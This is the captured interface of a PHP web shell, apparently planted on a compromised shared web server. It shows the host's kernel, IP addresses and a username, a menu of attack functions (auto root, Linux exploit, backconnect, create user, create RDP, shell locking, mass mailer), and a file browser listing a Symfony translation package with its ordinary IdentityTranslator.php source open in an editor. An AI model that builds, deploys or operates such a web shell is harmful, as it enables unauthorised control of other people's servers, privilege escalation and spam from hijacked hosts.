Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
symfony /
translation /
[ HOME SHELL ]
Name
Size
Permission
Action
Catalogue
[ DIR ]
drwxr-xr-x
Command
[ DIR ]
drwxr-xr-x
DataCollector
[ DIR ]
drwxr-xr-x
DependencyInjection
[ DIR ]
drwxr-xr-x
Dumper
[ DIR ]
drwxr-xr-x
Exception
[ DIR ]
drwxr-xr-x
Extractor
[ DIR ]
drwxr-xr-x
Formatter
[ DIR ]
drwxr-xr-x
Loader
[ DIR ]
drwxr-xr-x
Reader
[ DIR ]
drwxr-xr-x
Resources
[ DIR ]
drwxr-xr-x
Tests
[ DIR ]
drwxr-xr-x
Util
[ DIR ]
drwxr-xr-x
Writer
[ DIR ]
drwxr-xr-x
CHANGELOG.md
3.19
KB
-rw-r--r--
DataCollectorTranslator.php
4.75
KB
-rw-r--r--
IdentityTranslator.php
1.42
KB
-rw-r--r--
Interval.php
2.8
KB
-rw-r--r--
LICENSE
1.04
KB
-rw-r--r--
LoggingTranslator.php
3.5
KB
-rw-r--r--
MessageCatalogue.php
6.54
KB
-rw-r--r--
MessageCatalogueInterface.php
3.56
KB
-rw-r--r--
MessageSelector.php
3.34
KB
-rw-r--r--
MetadataAwareInterface.php
1.51
KB
-rw-r--r--
PluralizationRules.php
5.97
KB
-rw-r--r--
README.md
833
B
-rw-r--r--
Translator.php
13.5
KB
-rw-r--r--
TranslatorBagInterface.php
802
B
-rw-r--r--
TranslatorInterface.php
2.2
KB
-rw-r--r--
composer.json
1.36
KB
-rw-r--r--
phpunit.xml.dist
838
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : IdentityTranslator.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Translation; /** * IdentityTranslator does not translate anything. * * @author Fabien Potencier <fabien@symfony.com> */ class IdentityTranslator implements TranslatorInterface { private $selector; private $locale; /** * @param MessageSelector|null $selector The message selector for pluralization */ public function __construct(MessageSelector $selector = null) { $this->selector = $selector ?: new MessageSelector(); } /** * {@inheritdoc} */ public function setLocale($locale) { $this->locale = $locale; } /** * {@inheritdoc} */ public function getLocale() { return $this->locale ?: \Locale::getDefault(); } /** * {@inheritdoc} */ public function trans($id, array $parameters = [], $domain = null, $locale = null) { return strtr((string) $id, $parameters); } /** * {@inheritdoc} */ public function transChoice($id, $number, array $parameters = [], $domain = null, $locale = null) { return strtr($this->selector->choose((string) $id, (int) $number, $locale ?: $this->getLocale()), $parameters); } }
Close